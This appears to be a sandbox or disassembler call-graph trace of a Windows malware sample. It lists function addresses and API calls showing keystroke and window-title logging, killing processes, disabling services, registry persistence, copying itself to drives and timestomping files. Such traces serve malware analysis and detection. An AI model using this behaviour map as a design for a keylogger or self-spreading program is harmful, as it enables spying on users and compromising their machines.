30485->30511 30488->30415 30489->30485 30491 413fb4 GetLastError 30490->30491 30492 413fbf GetTokenInformation GetLastError 30490->30492 30495 4140c7 30491->30495 30493 413fe0 GetLastError 30492->30493 30494 413fe9 30492->30494 30496 4140bb CloseHandle 30493->30496 30497 410bf4 4 API calls 30494->30497 30495->30485 30496->30495 30498 413ff2 GetTokenInformation 30497->30498 30499 41409c GetLastError 30498->30499 30500 41400c GetLengthSid 30498->30500 30502 4140a4 30499->30502 30503 4140ab 30499->30503 30501 410bf4 4 API calls 30500->30501 30504 41401f InitializeAcl 30501->30504 30505 410c3b 2 API calls 30502->30505 30503->30496 30506 4140aa 30503->30506 30504->30499 30507 414031 AddAccessAllowedAce 30504->30507 30505->30506 30506->30503 30508 410c3b 2 API calls 30506->30508 30507->30499 30510 414047 6 API calls 30507->30510 30509 4140ba 30508->30509 30509->30496 30510->30499 30512 40682f FindClose 30511->30512 30520 406765 30511->30520 30512->30485 30513 4067b1 lstrcpyA lstrcatA lstrcatA 30516 413f8e 24 API calls 30513->30516 30514 406782 wsprintfA 30517 406718 37 API calls 30514->30517 30515 406818 FindNextFileA 30519 40682e 30515->30519 30515->30520 30518 4067eb SetFileAttributesA 30516->30518 30517->30520 30518->30520 30521 40680b 30518->30521 30519->30512 30520->30513 30520->30514 30520->30515 30525 414ef4 30520->30525 30521->30520 30524 406655 37 API calls 30521->30524 30524->30521 30533 413a97 GetFileAttributesA 30525->30533 30527 414eff 30528 414f04 30527->30528 30529 413f8e 24 API calls 30527->30529 30528->30520 30530 414f0e SetFileAttributesA 30529->30530 30534 413d02 MultiByteToWideChar LoadLibraryA GetProcAddress 30530->30534 30533->30527 30535 413d3e DeleteFileA 30534->30535 30535->30520 31562 41cc10 11 API calls 31563 41c853 149 API calls 31562->31563 31600 40d092 42 API calls 31601 422a91 54 API calls 31602 41cf94 64 API calls 31603 41ccd4 82 API calls 31602->31603 31564 426118 ExitProcess 31565 40901b 30 API calls 31605 41469f 55 API calls 31606 42379d 49 API calls 31567 425123 6 API calls 31608 4246ab 20 API calls 31609 403f74 359 API calls 31610 4248ae 37 API calls 31570 423b2d 13 API calls 31572 422d35 UnhandledExceptionFilter 31574 41ea3d 294 API calls 30536 40d83e GetTickCount 30537 40d851 30536->30537 30574 410be0 30537->30574 30539 40d857 30540 40d867 CreateThread Sleep 30539->30540 30541 40d87e CreateThread 30539->30541 30540->30541 31035 415d7a 105 API calls 30540->31035 30542 40d892 CreateThread GetTickCount 30541->30542 30623 405f6f 30541->30623 30544 40d8d2 30542->30544 30600 40683c 30542->30600 30545 40d8da 30544->30545 30546 40d8bd GetTickCount 30544->30546 30548 40f488 88 API calls 30545->30548 30546->30545 30547 40d8c7 Sleep 30546->30547 30547->30544 30549 40d8df CreateThread 30548->30549 30550 40d8ed 30549->30550 30879 40d016 30549->30879 30551 40c15d 80 API calls 30550->30551 30552 40d903 30550->30552 30553 40d8f6 Sleep 30550->30553 30551->30550 30554 41411e GetTickCount 30552->30554 30557 40d914 30552->30557 30553->30550 30553->30552 30554->30557 30555 40d942 30556 4140ca SHGetSpecialFolderLocation SHGetPathFromIDListA SHGetMalloc lstrcatA 30555->30556 30558 40d94f lstrcatA 30556->30558 30557->30555 30559 410a09 31 API calls 30557->30559 30560 413a97 GetFileAttributesA 30558->30560 30559->30555 30561 40d963 CreateThread 30560->30561 30562 40d982 CreateThread 30561->30562 30563 40d98e CreateThread CreateThread CreateThread CreateThread CreateThread 30561->30563 30998 401f9d 30561->30998 30562->30563 30987 41272f 30562->30987 30564 40d9d2 30563->30564 30565 40da0a CreateThread CreateThread CreateThread CreateThread 30563->30565 30888 4095b5 30563->30888 30910 406b75 30563->30910 30923 4056a7 30563->30923 30937 4116a8 30563->30937 30943 412fdd GetTickCount GetTickCount 30563->30943 30564->30565 30566 40d9da CreateThread CreateThread CreateThread CreateThread 30564->30566 30567 410a09 31 API calls 30565->30567 30717 407df4 30565->30717 30771 4157a7 30565->30771 30826 411206 Sleep 30565->30826 30836 41c19e 30565->30836 30566->30565 30632 408cb0 30566->30632 30639 4076c6 30566->30639 30645 4085ca 30566->30645 30706 4073ce 30566->30706 30568 40da3f 30567->30568 30569 410b43 49 API calls 30568->30569 30570 40da44 Sleep 30569->30570 30571 40c15d 80 API calls 30570->30571 30572 40da54 30571->30572 30572->30570 30573 40f488 88 API calls 30572->30573 30573->30572 30575 410b43 49 API calls 30574->30575 30576 410be5 30575->30576 30582 410a7d EnterCriticalSection 30576->30582 30578 410bea 30590 410abf EnterCriticalSection 30578->30590 30580 410bef 30581 410abf 85 API calls 30580->30581 30581->30580 30583 41040c 29 API calls 30582->30583 30584 410a9a 30583->30584 30585 410ab4 LeaveCriticalSection 30584->30585 30598 412e93 8 API calls 30584->30598 30585->30578 30587 410aab 30588 410c3b 2 API calls 30587->30588 30589 410ab1 30588->30589 30589->30585 30591 41040c 29 API calls 30590->30591 30592 410adc 30591->30592 30593 410af6 LeaveCriticalSection 30592->30593 30599 403b3b 61 API calls 30592->30599 30593->30580 30595 410aed 30596 410c3b 2 API calls 30595->30596 30597 410af3 30596->30597 30597->30593 30598->30587 30599->30595 30601 406849 30600->30601 31036 405b34 30601->31036 30603 40684e 30604 413d4d 7 API calls 30603->30604 30605 40685a 30604->30605 30606 406860 CreateThread 30605->30606 30620 406875 30605->30620 30614 4069a1 30606->30614 31134 40604a 144 API calls 30606->31134 30607 406882 GetTickCount 30608 406892 30607->30608 30607->30620 30609 40c4ce 5 API calls 30608->30609 30611 406894 Sleep 30608->30611 30612 4068ab GetTickCount 30608->30612 30609->30608 30611->30608 30612->30620 30615 4068f3 lstrcpyA OpenProcess 30616 40691a K32EnumProcessModules 30615->30616 30615->30620 30618 406976 CloseHandle 30616->30618 30619 40692f K32GetModuleBaseNameA 30616->30619 30617 406984 EnumWindows 30617->30620 31133 405fd0 8 API calls 30617->31133 30618->30620 30619->30620 30620->30607 30620->30608 30620->30615 30620->30617 30620->30618 30621 413761 51 API calls 30620->30621 30622 406966 TerminateProcess 30620->30622 31074 405b01 30620->31074 30621->30620 30622->30620 30624 405b34 78 API calls 30623->30624 30625 405f7b 30624->30625 30626 405fa5 30625->30626 30627 405f9d GetTickCount 30625->30627 30629 40c4ce 5 API calls 30626->30629 30630 405fb6 GetTickCount 30626->30630 30631 405fa7 Sleep 30626->30631 30627->30626 30628 405fba EnumWindows Sleep 30627->30628 30628->30625 31135 405d79 Sleep IsWindowVisible 30628->31135 30629->30626 30630->30628 30631->30626 30634 408ccb 30632->30634 30633 408ccc Sleep 30633->30634 30634->30633 30635 408ceb 30634->30635 30636 408ce0 Sleep 30634->30636 30635->30633 30637 4140ca 4 API calls 30635->30637 31159 408912 139 API calls 30635->31159 30636->30634 30637->30635 30640 4076d8 30639->30640 30641 4076dd Sleep 30640->30641 30644 4076e8 30640->30644 30641->30640 30642 4140ca 4 API calls 30642->30644 30644->30641 30644->30642 31160 4074a2 113 API calls 30644->31160 30646 4085e0 30645->30646 30647 4085d5 Sleep 30646->30647 30648 4085e9 GetWindowsDirectoryA 30646->30648 30647->30646 30649 413410 lstrcpyA 30648->30649 30650 40864a lstrcpyA lstrcatA lstrcatA 30649->30650 31161 413a97 GetFileAttributesA 30650->31161 30652 408691 30653 408757 30652->30653 30654 40869a 30652->30654 30655 413410 lstrcpyA 30653->30655 30656 413410 lstrcpyA 30654->30656 30657 408767 lstrcpyA lstrcatA lstrcatA 30655->30657 30658 4086c0 RegCreateKeyExA 30656->30658 31165 413a97 GetFileAttributesA 30657->31165 30660 413410 lstrcpyA 30658->30660 30662 4086ec RegSetValueExA RegCloseKey Sleep 30660->30662 30661 40879d 30663 4087a2 30661->30663 30664 4087af 30661->30664 31162 408324 106 API calls 30662->31162 31166 408324 106 API calls 30663->31166 30666 413410 lstrcpyA 30664->30666 30669 4087bf lstrcpyA lstrcatA lstrcatA 30666->30669 30667 408719 30667->30653 30670 40871e ShellExecuteA Sleep 30667->30670 31167 413a97 GetFileAttributesA 30669->31167 31163 4142ee CreateToolhelp32Snapshot Process32First lstrcmpiA Process32Next CloseHandle 30670->31163 30671 4087ae 30671->30664 30674 4087f5 30676 408807 30674->30676 30677 4087fa 30674->30677 30675 408744 30675->30653 31164 408324 106 API calls 30675->31164 30680 413410 lstrcpyA 30676->30680 31168 408324 106 API calls 30677->31168 30683 408817 lstrcpyA lstrcatA lstrcatA 30680->30683 30681 408806 30681->30676 30682 408756 30682->30653 31169 413a97 GetFileAttributesA 30683->31169 30685 40884b 30686 408850 30685->30686 30687 40885d 30685->30687 31170 408324 106 API calls 30686->31170 30688 413410 lstrcpyA 30687->30688 30690 40886d lstrcpyA lstrcatA lstrcatA 30688->30690 31171 413a97 GetFileAttributesA 30690->31171 30691 40885c 30691->30687 30693 4088a1 30694 4088b3 30693->30694 30695 4088a6 30693->30695 30697 413410 lstrcpyA 30694->30697 31172 408324 106 API calls 30695->31172 30699 4088c3 lstrcpyA lstrcatA lstrcatA 30697->30699 30698 4088b2 30698->30694 31173 413a97 GetFileAttributesA 30699->31173 30701 4088f7 30702 40890c 30701->30702 30703 4088ff 30701->30703 31174 408324 106 API calls 30703->31174 30705 40890b 30705->30702 30707 4073df 30706->30707 30709 4073eb 30706->30709 30708 407409 Sleep 30710 407410 GetLogicalDriveStringsA 30708->30710 30709->30708 30709->30710 30712 407452 GetDriveTypeA 30709->30712 30714 40744a 30709->30714 30710->30709 30711 407490 Sleep 30710->30711 30711->30709 30713 407481 lstrlenA 30712->30713 30712->30714 30713->30709 30713->30711 30714->30711 30714->30712 30714->30713 30715 407468 lstrcpyA 30714->30715 31175 407259 102 API calls 30715->31175 30731 407e01 30717->30731 30718 407e0c Sleep 30718->30731 30719 407e39 Sleep 30719->30731 30720 407e4d lstrcpyA lstrlenA 30721 413663 2 API calls 30720->30721 30722 407e7b lstrcatA 30721->30722 31176 4079cf GetTickCount 30722->31176 30724 407e98 lstrcatA 30724->30731 30725 407ebf GetTickCount 30725->30731 30726 407ecb GetLogicalDriveStringsA 30727 407ef1 GetDriveTypeA 30726->30727 30726->30731 30728 4082b3 lstrlenA 30727->30728 30727->30731 30728->30727 30728->30731 30729 408307 Sleep 30729->30731 30730 4082eb lstrlenA 30730->30731 30731->30718 30731->30719 30731->30720 30731->30725 30731->30726 30731->30728 30731->30729 30731->30730 30732 407f4a lstrcatA 30731->30732 30734 407fa8 lstrlenA 30731->30734 30736 407f6e 30731->30736 30733 407b8f 13 API calls 30732->30733 30733->30731 30735 4136ff lstrlenA 30734->30735 30737 407fc7 30735->30737 30736->30731 31210 414d8e CreateFileA 30736->31210 31211 407d1e 27 API calls 30736->31211 30739 413663 2 API calls 30737->30739 30740 407fde lstrcatA 30739->30740 30742 4136ff lstrlenA 30740->30742 30743 407ff4 30742->30743 30744 413663 2 API calls 30743->30744 30745 40800b lstrcatA 30744->30745 30746 4136ff lstrlenA 30745->30746 30747 40801c 30746->30747 30748 413663 2 API calls 30747->30748 30749 408033 lstrcatA lstrcpyA 30748->30749 31193 407b8f 30749->31193 30751 40805f 30752 408072 lstrcpyA 30751->30752 31212 414d8e CreateFileA 30751->31212 30754 407b8f 13 API calls 30752->30754 30755 40808c 30754->30755 30756 40809f lstrcpyA 30755->30756 31213 414d8e CreateFileA 30755->31213 30758 407b8f 13 API calls 30756->30758 30761 4080b9 30758->30761 30760 413663 2 API calls 30760->30761 30761->30760 30762 413410 lstrcpyA 30761->30762 31214 414d8e CreateFileA 30761->31214 30763 408116 lstrcatA SetFileAttributesA CreateFileA 30762->30763 30766 40815c 30763->30766 30764 408167 Sleep CreateFileA 30764->30766 30765 4082a4 SetFileAttributesA 30765->30728 30766->30764 30766->30765 30767 413410 lstrcpyA 30766->30767 31199 413aac GetTickCount 30766->31199 30768 408249 wsprintfA lstrlenA WriteFile CloseHandle 30767->30768 31198 414d8e CreateFileA 30768->31198 31239 421df0 30771->31239 30773 4157b6 GetTickCount 30774 4157c5 30773->30774 30775 4157ce Sleep 30774->30775 30776 4157de 30774->30776 30775->30774 31241 415755 EnumWindows 30776->31241 30778 415802 Sleep 30779 415b05 ShowWindow GetWindowThreadProcessId GetCurrentProcess SetPriorityClass 30778->30779 30794 4157fc 30778->30794 30780 415b30 Sleep 30779->30780 31268 40245c 30780->31268 30781 41582c Sleep 31245 412c9d 30781->31245 30785 415845 GetCurrentProcess SetPriorityClass 30785->30794 30786 41587d lstrcpyA 31252 414af0 6 API calls 30786->31252 30789 41589a 30790 4158a4 lstrlenA wsprintfA 30789->30790 30791 4158c6 lstrcatA 30789->30791 30790->30791 30793 4136ff lstrlenA 30791->30793 30792 41592a GetWindowRect 30792->30794 30804 4158fc 30792->30804 30795 4158da lstrlenA 30793->30795 30794->30778 30794->30779 30794->30781 30794->30785 30794->30786 30794->30792 30797 415755 4 API calls 30794->30797 30798 4159b2 Sleep 30794->30798 30794->30804 30796 413663 2 API calls 30795->30796 30796->30794 30797->30794 30798->30794 30799 41413a SendInput Sleep SendInput 30799->30804 30801 41597c Sleep 31255 4153e2 23 API calls 30801->31255 30803 4152ab 14 API calls 30803->30804 30804->30779 30804->30792 30804->30794 30804->30799 30804->30803 31253 402f35 98 API calls 30804->31253 31254 41413a SendInput Sleep SendInput 30804->31254 31256 415385 22 API calls 30804->31256 30806 4159f3 ShowWindow Sleep ShowWindow 31257 415434 22 API calls 30806->31257 30810 415a1b 31258 4152ab 14 API calls 30810->31258 31259 415497 25 API calls 30810->31259 31260 415104 6 API calls 30810->31260 31261 415623 59 API calls 30810->31261 30813 415a83 ShowWindow Sleep 31262 4152ab 14 API calls 30813->31262 30815 415a9f 31263 4154d8 23 API calls 30815->31263 30817 415aab ShowWindow Sleep 31264 4152ab 14 API calls 30817->31264 30819 415ac2 31265 415547 30 API calls 30819->31265 30821 415acf ShowWindow Sleep 31266 4152ab 14 API calls 30821->31266 30823 415ae6 31267 4155b7 22 API calls 30823->31267 30825 415af2 ShowWindow 30825->30779 30833 41122e 30826->30833 30827 411223 Sleep 30827->30833 30828 411238 Sleep 30828->30833 30829 41124b gethostname 30830 41126e gethostbyname 30829->30830 30829->30833 30831 4112bb Sleep 30830->30831 30830->30833 30832 4112d8 30831->30832 30831->30833 30832->30833 30833->30827 30833->30828 30833->30829 30833->30831 30834 41129d inet_ntoa 30833->30834 31303 411145 lstrcpyA lstrlenA 30834->31303 30837 41c1b6 Sleep 30836->30837 30840 41c1bf 30837->30840 30838 41c299 Sleep 30838->30840 30839 41c1cb GetTickCount 30841 41c1ea GetTickCount 30839->30841 30840->30838 30840->30839 30847 41c270 GetTickCount 30840->30847 30849 41c2a9 30840->30849 30843 41c1d7 30841->30843 30848 410a09 31 API calls 30843->30848 31331 414787 16 API calls 30843->31331 31332 41c118 53 API calls 30843->31332 30844 41c1e1 Sleep 30844->30841 30846 412c9d 8 API calls 30846->30849 30847->30838 30847->30840 30848->30840 30849->30846 30850 41c2a2 Sleep 30849->30850 30851 41c2bd GetTickCount 30849->30851 30850->30849 30852 41c2e1 GetTickCount 30851->30852 30860 41c2c9 30852->30860 30853 41bda5 60 API calls 30853->30860 30854 41c2da Sleep 30854->30852 30855 41c335 31335 414776 EnumWindows 30855->31335 30856 41c2fe Sleep 31333 41bda5 56 API calls 30856->31333 30857 41c327 Sleep 30857->30837 30860->30837 30860->30853 30860->30854 30860->30855 30860->30856 30860->30857 30862 41c313 Sleep 30860->30862 31334 41bf95 9 API calls 30860->31334 30861 41c33b 31336 41411e GetTickCount 30861->31336 30862->30860 30865 41c347 30866 410a09 31 API calls 30865->30866 30867 41c367 InitializeCriticalSection InitializeCriticalSection InitializeCriticalSection Sleep 30866->30867 31337 41bec1 6 API calls 30867->31337 30869 41c3a5 31338 41bdf3 41 API calls 30869->31338 30872 41c3c5 31339 41c10a EnumWindows 30872->31339 30873 41c4aa CreateThread 30874 41c4ae CreateThread 30873->30874 31346 41c62e EnterCriticalSection EnumWindows Sleep LeaveCriticalSection 30873->31346 30876 41c4ba 30874->30876 31347 4218d6 Sleep EnterCriticalSection EnumWindows Sleep 30874->31347 30875 41c46d 30875->30873 30875->30874 31340 41f298 74 API calls 30876->31340 30878 41c4bf Sleep 30878->30876 30882 40d01e 30879->30882 30880 40c472 OpenMutexA CloseHandle lstrlenA lstrcpyA 30880->30882 30881 40cedf 34 API calls 30885 40d02c 30881->30885 30882->30880 30883 40d08b 30882->30883 30884 40c4ce 5 API calls 30882->30884 30882->30885 30886 40d05f ShellExecuteA 30882->30886 30887 40d080 Sleep 30882->30887 30884->30882 30885->30881 30885->30882 30886->30882 30887->30882 30896 4095d5 30888->30896 30889 4095ca Sleep 30889->30896 30890 4095df Sleep 30890->30896 30891 40a680 Sleep 30892 40a694 GetKeyState GetAsyncKeyState 30891->30892 30893 40a6b4 GetKeyState 30892->30893 30892->30896 30895 40a6de GetKeyState 30893->30895 30893->30896 30894 40a738 GetForegroundWindow GetWindowTextA lstrlenA 30894->30896 30895->30896 30896->30889 30896->30890 30896->30891 30896->30892 30896->30894 30896->30895 30897 40a815 lstrlenA 30896->30897 30900 40a831 lstrlenA 30896->30900 30901 40a865 lstrcatA 30896->30901 30903 40a8fd lstrcatA 30896->30903 30906 40a911 lstrcatA 30896->30906 30908 40c472 OpenMutexA CloseHandle lstrlenA lstrcpyA 30896->30908 30909 40a8d1 Sleep 30896->30909 31351 411574 12 API calls 30896->31351 30897->30896 30898 40a84c 30897->30898 30898->30896 31350 409530 8 API calls 30898->31350 30900->30896 30902 40a840 lstrcatA 30900->30902 30904 40a880 lstrcatA lstrcatA lstrcatA lstrcatA lstrlenA 30901->30904 30905 40a878 lstrcatA 30901->30905 30902->30898 30903->30896 30904->30896 30905->30904 30906->30896 30908->30896 30909->30896 30911 406bb7 GetTickCount 30910->30911 30914 406bc3 30911->30914 30912 41411e GetTickCount 30912->30914 30913 41a7a8 8 API calls 30913->30914 30914->30912 30914->30913 30915 41a5dd lstrcpyA 30914->30915 30921 406d7f Sleep 30914->30921 31352 413450 lstrcpyA 30914->31352 31355 413450 lstrcpyA 30914->31355 30915->30914 30917 406cb3 lstrcatA lstrcatA 31353 406b26 gethostbyname 30917->31353 30920 406d30 lstrcatA lstrcatA 30922 406b26 gethostbyname 30920->30922 30921->30911 30922->30914 30924 4056b4 30923->30924 30925 4056c6 Sleep 30924->30925 30926 4056cf GetTickCount 30924->30926 30925->30924 30933 4056e4 30926->30933 30927 4057b6 Sleep GetTickCount 30927->30933 30930 4057d9 GetTickCount 30930->30933 30931 4057a7 Sleep 30931->30933 30933->30927 30933->30931 30934 410987 33 API calls 30933->30934 31356 41411e GetTickCount 30933->31356 31357 4054bd 392 API calls 30933->31357 31358 4109c8 32 API calls 30933->31358 31359 402587 8 API calls 30933->31359 31360 410987 33 API calls 30933->31360 30934->30933 30941 4116af 30937->30941 30938 411704 Sleep 30938->30941 30939 4116e4 30939->30938 31361 40c5d0 23 API calls 30939->31361 31362 4115b6 GetProcessHeap RtlFreeHeap EnterCriticalSection LeaveCriticalSection 30939->31362 30941->30938 30941->30939 30945 41301f 30943->30945 30944 413037 30946 41303a Sleep 30944->30946 30947 41304e GetTickCount 30944->30947 30945->30944 31363 4015bb 30945->31363 30946->30944 31373 40278d GetTickCount 30947->31373 30951 41307a GetTickCount 30959 41305c 30951->30959 30952 413150 GetTickCount 30952->30959 30983 4130ca 30952->30983 30953 40245c 90 API calls 30953->30959 30954 4131c9 Sleep 30954->30959 30955 40245c 90 API calls 30955->30983 30956 41312d GetTickCount 30956->30959 30957 413253 Sleep 30957->30959 30957->30983 30958 4015bb 12 API calls 30958->30959 30959->30951 30959->30952 30959->30953 30959->30954 30959->30956 30959->30957 30959->30958 30963 4131e8 GetTickCount 30959->30963 30967 413249 GetTickCount 30959->30967 30970 41320c lstrcpyA lstrlenA 30959->30970 30959->30983 31382 412c42 GetTickCount 30959->31382 30960 4132ae GetTickCount 30960->30983 30963->30957 30963->30959 30965 413342 GetTickCount 30965->30983 30967->30957 30969 4131a6 GetTickCount 30969->30959 30974 413732 3 API calls 30970->30974 30971 413321 GetTickCount 30971->30983 30972 413363 Sleep 30975 41337a InternetGetConnectedState 30972->30975 30980 41323a 30974->30980 30978 413373 Sleep 30975->30978 30975->30983 30976 4130e0 GetTickCount 30976->30983 30977 4015bb 12 API calls 30977->30980 30978->30975 30980->30967 30980->30977 30982 4133e3 GetTickCount 30982->30944 30982->30983 30983->30955 30983->30959 30983->30960 30983->30965 30983->30971 30983->30972 30983->30982 30985 410a09 31 API calls 30983->30985 31384 412b7e 8 API calls 30983->31384 31385 41285e GetProcessHeap Sleep GetProcessHeap RtlAllocateHeap 30983->31385 31386 4128b1 GetTickCount 30983->31386 31387 412b7e 8 API calls 30983->31387 31388 41411e GetTickCount 30983->31388 31389 417016 182 API calls 30983->31389 31390 412a45 GetTickCount 30983->31390 31391 412909 GetTickCount 30983->31391 31392 410946 31 API calls 30983->31392 30986 413406 GetTickCount 30985->30986 30986->30944 30988 412746 30987->30988 30989 412743 Sleep 30988->30989 30990 41274e CreateThread GetTickCount 30988->30990 30989->30988 30991 41277d 30990->30991 31439 4126ae 30990->31439 30992 412785 30991->30992 30993 41276c GetTickCount 30991->30993 31401 4121eb 30992->31401 30993->30992 30994 412776 Sleep 30993->30994 30994->30991 30996 41278a Sleep 30996->30996 30997 412795 30996->30997 30997->30992 31001 401fb1 30998->31001 30999 401fe9 Sleep 30999->31001 31000 410c3b GetProcessHeap RtlFreeHeap 31000->31001 31001->30999 31001->31000 31002 406718 47 API calls 31001->31002 31017 402273 Sleep 31001->31017 31020 4022ab Sleep 31001->31020 31022 4022ce Sleep 31001->31022 31023 402302 Sleep 31001->31023 31025 402324 SetFileAttributesA CreateFileA 31001->31025 31490 401511 GetProcessHeap Sleep GetProcessHeap RtlAllocateHeap 31001->31490 31003 4020af lstrcpyA lstrcatA lstrlenA 31002->31003 31004 413663 2 API calls 31003->31004 31005 4020f0 lstrcatA 31004->31005 31447 414883 Sleep wsprintfA FindFirstFileA 31005->31447 31007 40210f 31008 413663 2 API calls 31007->31008 31009 40211a lstrcpyA lstrcatA lstrcatA SetFileAttributesA 31008->31009 31456 401ebd 31009->31456 31011 402169 CopyFileA 31016 402164 31011->31016 31013 402251 Sleep 31477 4012e0 31013->31477 31016->31011 31016->31013 31018 4021b6 wsprintfA lstrcpyA lstrlenA 31016->31018 31472 4094e3 SetFileAttributesA 31016->31472 31489 401270 97 API calls 31016->31489 31017->31001 31019 4079cf 69 API calls 31018->31019 31021 4021f9 6 API calls 31019->31021 31020->31001 31021->31013 31022->31001 31023->31001 31025->31001 31026 402362 31025->31026 31027 402380 WriteFile CloseHandle 31026->31027 31028 402450 CloseHandle 31026->31028 31029 401e2a 17 API calls 31027->31029 31028->31001 31030 4023a8 31029->31030 31030->31001 31031 4023c0 SetFileAttributesA CopyFileA DeleteFileA 31030->31031 31032 414883 13 API calls 31031->31032 31033 402407 ShellExecuteA 31032->31033 31491 4013cb 15 API calls 31033->31491 31037 405d6b LeaveCriticalSection 31036->31037 31038 405b4c EnterCriticalSection 31036->31038 31037->30603 31038->31037 31039 405b63 GetDesktopWindow GetWindowRect 31038->31039 31079 410a33 EnterCriticalSection 31039->31079 31041 405b7a 31042 405b90 31041->31042 31087 4058e5 31041->31087 31044 405b01 7 API calls 31042->31044 31046 405bad 31044->31046 31048 413410 lstrcpyA 31046->31048 31049 405bc0 SHDeleteKeyA 31048->31049 31050 413410 lstrcpyA 31049->31050 31051 405be6 SHDeleteKeyA 31050->31051 31052 413410 lstrcpyA 31051->31052 31053 405c12 RegCreateKeyExA 31052->31053 31054 413410 lstrcpyA 31053->31054 31055 405c30 RegDeleteValueA RegCloseKey 31054->31055 31056 405c4b 31055->31056 31057 413663 2 API calls 31056->31057 31059 405cdd 31056->31059 31062 405c9c lstrcmpiA 31056->31062 31065 4057e4 GetProcessHeap Sleep GetProcessHeap RtlAllocateHeap 31056->31065 31058 405c67 lstrlenA 31057->31058 31058->31056 31060 4136ff lstrlenA 31059->31060 31061 405ce2 31060->31061 31063 413663 2 API calls 31061->31063 31062->31056 31064 405cf9 lstrlenA 31063->31064 31066 405d21 31064->31066 31067 405d09 31064->31067 31065->31056 31066->31037 31068 405d28 31067->31068 31069 405d13 31067->31069 31071 405d48 31068->31071 31072 405d2e lstrcmpiA 31068->31072 31115 4057e4 GetProcessHeap Sleep GetProcessHeap RtlAllocateHeap 31069->31115 31116 4057e4 GetProcessHeap Sleep GetProcessHeap RtlAllocateHeap 31071->31116 31072->31066 31072->31068 31075 405b32 Sleep K32EnumProcesses 31074->31075 31076 405b0a 31074->31076 31075->30614 31075->30620 31076->31075 31125 413a12 OpenSCManagerA 31076->31125 31080 41040c 29 API calls 31079->31080 31081 410a53 31080->31081 31082 410a6f LeaveCriticalSection 31081->31082 31117 405a30 6 API calls 31081->31117 31082->31041 31084 410a64 31085 410c3b 2 API calls 31084->31085 31086 410a6c 31085->31086 31086->31082 31088 413410 lstrcpyA 31087->31088 31094 405919 31088->31094 31089 405980 31092 413410 lstrcpyA 31089->31092 31090 405926 lstrlenA 31091 405975 lstrlenA 31090->31091 31090->31094 31091->31094 31104 405994 31092->31104 31093 4057e4 GetProcessHeap Sleep GetProcessHeap RtlAllocateHeap 31093->31094 31094->31089 31094->31090 31094->31091 31094->31093 31097 40594d lstrcmpiA 31094->31097 31095 4059f5 31099 413410 lstrcpyA 31095->31099 31096 40599b lstrlenA 31098 4059ea lstrlenA 31096->31098 31096->31104 31097->31091 31097->31094 31098->31104 31100 405a09 31099->31100 31102 405a25 31100->31102 31118 405820 6 API calls 31100->31118 31101 4059c2 lstrcmpiA 31101->31098 31101->31104 31107 410905 EnterCriticalSection 31102->31107 31104->31095 31104->31096 31104->31098 31104->31101 31106 4057e4 GetProcessHeap Sleep GetProcessHeap RtlAllocateHeap 31104->31106 31105 405a18 lstrlenA 31105->31100 31106->31104 31119 405a6d 31107->31119 31110 41093b LeaveCriticalSection 31110->31042 31111 4106f5 29 API calls 31112 410932 31111->31112 31113 410c3b 2 API calls 31112->31113 31114 410938 31113->31114 31114->31110 31115->31066 31116->31066 31117->31084 31118->31105 31120 405a90 31119->31120 31121 405a7d 31119->31121 31120->31110 31120->31111 31121->31120 31122 410bf4 4 API calls 31121->31122 31124 405aaa 31122->31124 31123 410c3b 2 API calls 31123->31120 31124->31120 31124->31123 31126 405b21 Sleep 31125->31126 31127 413a3b OpenServiceA 31125->31127 31126->31076 31128 413a51 31127->31128 31129 413a54 ControlService 31127->31129 31128->31129 31130 413a65 31129->31130 31131 413a81 CloseServiceHandle CloseServiceHandle 31130->31131 31132 413a6d ChangeServiceConfigA 31130->31132 31131->31126 31132->31131 31136 405da1 GetWindowTextA GetWindowThreadProcessId 31135->31136 31137 405f5f 31135->31137 31138 405dd3 31136->31138 31148 405e22 31136->31148 31140 413761 51 API calls 31138->31140 31139 405e2f 31141 405f08 31139->31141 31142 405e3b GetClassNameA 31139->31142 31145 405de2 31140->31145 31141->31137 31147 413761 51 API calls 31141->31147 31143 413761 51 API calls 31142->31143 31144 405e58 31143->31144 31144->31141 31146 405e62 PostMessageA 31144->31146 31145->31148 31149 405df7 ShowWindow PostMessageA SetWindowPos DestroyWindow 31145->31149 31150 405f57 ShowWindow 31146->31150 31151 405f27 31147->31151 31148->31139 31152 413761 51 API calls 31148->31152 31155 405eaf 31148->31155 31149->31148 31150->31137 31151->31137 31153 405f2d GetWindowThreadProcessId 31151->31153 31152->31148 31153->31137 31154 405f49 PostMessageA DestroyWindow 31153->31154 31154->31150 31156 405ed5 ShowWindow PostMessageA EnableWindow 31155->31156 31157 405ec6 ShowWindow PostMessageA 31155->31157 31158 405eea SetWindowPos DestroyWindow 31156->31158 31157->31158 31158->31137 31159->30635 31160->30644 31161->30652 31162->30667 31163->30675 31164->30682 31165->30661 31166->30671 31167->30674 31168->30681 31169->30685 31170->30691 31171->30693 31172->30698 31173->30701 31174->30705 31175->30714 31177 4079fb 31176->31177 31178 4140ca 4 API calls 31177->31178 31180 407abc 31177->31180 31179 407a1e 31178->31179 31215 407850 Sleep wsprintfA FindFirstFileA 31179->31215 31182 413663 2 API calls 31180->31182 31184 407acb 31180->31184 31182->31184 31183 407a2b 31183->31180 31185 407a3f lstrlenA 31183->31185 31184->30724 31186 407a5a 31185->31186 31187 407a7d lstrcpyA 31185->31187 31186->31187 31189 407a97 31186->31189 31188 407850 60 API calls 31187->31188 31188->31189 31189->31180 31190 4140ca 4 API calls 31189->31190 31191 407aaf 31190->31191 31192 407850 60 API calls 31191->31192 31192->31180 31194 407b99 31193->31194 31195 407bd7 31194->31195 31231 407b0a SetFileAttributesA CreateFileA 31194->31231 31195->30751 31198->30766 31238 421d78 31199->31238 31201 413abf GetSystemTime 31202 413ad5 31201->31202 31203 413ae4 SystemTimeToFileTime 31202->31203 31204 413b0d 31203->31204 31205 413b2d SystemTimeToFileTime 31204->31205 31206 413b47 31205->31206 31207 413b7b SystemTimeToFileTime CreateFileA 31206->31207 31208 413bb2 SetFileTime CloseHandle 31207->31208 31209 413bcc 31207->31209 31208->31209 31209->30766 31210->30736 31211->30736 31212->30751 31213->30755 31214->30761 31220 4079b7 FindClose 31215->31220 31223 4078a7 31215->31223 31217 4078be wsprintfA 31218 407850 54 API calls 31217->31218 31218->31223 31219 413761 51 API calls 31219->31223 31220->31183 31221 407983 FindNextFileA 31221->31220 31221->31223 31223->31217 31223->31219 31223->31220 31223->31221 31227 414b64 lstrlenA 31223->31227 31228 40777d lstrlenA 31223->31228 31229 407715 51 API calls 31223->31229 31230 40774b lstrcpynA 31223->31230 31227->31223 31228->31223 31229->31223 31230->31223 31232 407b43 WriteFile 31231->31232 31233 407b55 CloseHandle 31231->31233 31232->31233 